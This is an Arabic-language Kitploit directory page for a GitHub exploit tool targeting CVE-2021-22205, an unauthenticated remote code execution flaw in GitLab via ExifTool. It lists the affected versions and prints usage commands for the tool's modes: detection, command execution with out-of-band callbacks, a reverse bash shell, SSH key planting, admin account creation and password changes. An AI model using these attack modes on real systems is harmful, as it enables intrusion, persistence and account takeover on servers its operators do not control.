Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22205 — RCE قبل المصادقة في GitLab CE/EE باستخدام ExifTool | Kitploit
أدوات/GitHubGitHub/inspiringz/cve-2021-22205
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدArchived
GitHubinspiringz/cve-2021-22205

CVE-2021-22205

RCE قبل المصادقة في GitLab CE/EE باستخدام ExifTool

عرض المستودع
237412منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22205

GitLab CE/EE RCE قبل التوثيق باستخدام ExifTool

هذا المشروع مخصص للتعلم فقط، إذا تم انتهاك حقوق شخص ما، يرجى الاتصال بي لإزالة المشروع، والأهم لا تستخدمه بشكل غير قانوني. إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، فستتحمل جميع العواقب بنفسك. جميع المطورين وجميع المساهمين في هذه الأداة لا يتحملون أي مسؤولية قانونية أو تضامنية.

الوصف

تم اكتشاف مشكلة في GitLab CE/EE تؤثر على جميع الإصدارات بدءًا من 11.9. لم يكن GitLab يتحقق بشكل صحيح من ملفات الصور التي يتم تمريرها إلى محلل ملفات مما أدى إلى تنفيذ أوامر عن بعد.

الإصدارات المتأثرة:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

الميزات

  • اكتشاف إصدار Gitlab من خلال التجزئة في Webpack manifest.json

  • تفاعلات خارج النطاق تلقائية مع DNSLog و PostBin RequestBin

  • دعم الـ Reverse Bash Shell / إضافة مفتاح SSH إلى authorized_keys

  • دعم تعديل واستعادة كلمة مرور مستخدم gitlab عن طريق ENTER

الاستخدام

root@kitploit:~
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • تنسيق معامل site_url: http[s]://<domain|ip>[:port]/، مثل: https://example.com:9000/
  • الطرق (rce2, add) المميزة بـ * غير مستقرة وقد لا تعمل :(
  • يمكنك تعديل محتوى السكربت وفقًا للبيئة الفعلية

لقطة شاشة

الكشف:

image-20220116233646585

RCE (صدى عبر RequestBin OOB):

image-20220116234003576

Reverse Bash Shell:

image-20211111131442470

إضافة مفتاح SSH إلى authorized_keys:

image-20211111133555010

تعديل واستعادة كلمة مرور مستخدم Gitlab:

image-20211111132115090

المراجع

  • https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
  • https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
  • https://github.com/righel/gitlab-version-nse
تنزيل الأداة